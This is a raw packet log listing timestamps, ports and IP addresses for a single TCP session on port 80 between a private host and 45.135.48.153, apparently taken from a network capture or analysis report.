Apr 19, 2022 16:44:42.920993090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921010971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921020031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921030045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921041012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921049118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921066999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921078920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921087027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921106100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921128988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921159983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921181917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921354055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921400070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921435118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921595097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921674013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921721935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.921870947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921890974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.921921015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922061920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922107935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922144890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922348022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922462940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922518015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922570944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922619104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922677994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922694921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922713041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922733068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922760963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922796011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922801018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922816038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922833920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922852993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922864914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922871113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922889948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922899008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922909021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922926903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922945023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922952890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.922964096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922981977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.922986984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.923002005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.923012972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.923043966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.923132896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.924535990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.924897909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.924916983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.924989939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.925029993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.925153017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925173044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925239086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.925276995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925543070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925666094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925734043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.925920010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.925976992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926179886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926310062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926563025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926625013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926681995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926737070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926820993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926839113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926858902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926877022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926894903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926903009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926913023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926930904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926935911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926949978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926968098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.926979065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.926986933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927005053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927011967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927022934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927042007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927054882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927059889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927081108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927087069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927115917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927172899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927309990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927369118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927427053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927479982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927567959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927629948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927689075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.927725077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927809954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.927953959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.928013086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.928219080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.928273916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.929968119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.930535078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.930979967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931040049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931057930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.931094885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.931230068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931297064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931314945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931371927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.931749105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931874990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931941032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.931941986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931961060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931981087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.931988001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.932002068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932019949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932029009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.932040930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932065964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.932122946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932261944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932315111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.932451963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932502985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.932585001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932770014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.932961941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933015108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933024883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933043003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933073044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933279991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933330059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933341026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933409929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933474064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933522940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933598995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933619022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933636904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933649063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933657885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933676958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933681965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933696032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933716059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933733940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933734894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933753014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933754921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933773041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933790922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933809996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933814049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933830023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933830976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933849096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933867931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933887959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933896065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933906078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.933929920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933959007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.933995008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.934192896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.934822083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.934890032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.935796022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.936568022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.936614037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.936642885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.936666965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.936743021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.936873913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937002897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937057018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.937062979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937108994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.937249899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937319994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937383890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937433004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.937573910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937625885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.937643051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937830925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937896013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.937947035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938024044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938075066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938091040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938245058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938265085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938282967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938302994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938317060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938322067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938343048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938355923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938363075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938371897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938380957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938400030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938415051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938420057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938438892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938451052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938458920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938477993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938496113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938498974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938514948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938519001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938536882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938555956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938575029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938580990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938592911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938611984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938612938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938632011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938647985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938652039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938673019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938688040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.938941956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.938992977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.940010071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.940094948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.940982103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941005945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941073895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.941282988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941349030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941411972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941468954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.941526890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941549063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941572905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941586018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.941612005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.941921949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.941984892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942039967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942111969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942194939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942239046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942295074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942498922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942554951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942564011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942689896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942713022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942735910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942760944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942780018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942819118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942840099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942878962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942900896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942929029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.942936897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.942956924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.943136930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943200111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943258047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.943394899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943444014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.943586111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943712950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943767071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.943826914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943850040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.943898916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.944037914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944164991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944291115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944348097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.944406986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944453955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.944546938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944670916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944735050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944783926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.944854975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.944912910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.944981098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945116997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945375919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945430040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.945439100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945482016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.945504904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945633888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945759058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945816994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.945825100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945874929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945898056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945924044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.945930004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945954084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945965052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.945975065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945998907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.945998907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946022034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946043968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946043968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946065903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946089029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946110964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946110964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946132898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946151018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946156025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946171045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946197987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946221113 CEST	80	49758	45.135.48.153	192.168.2.4
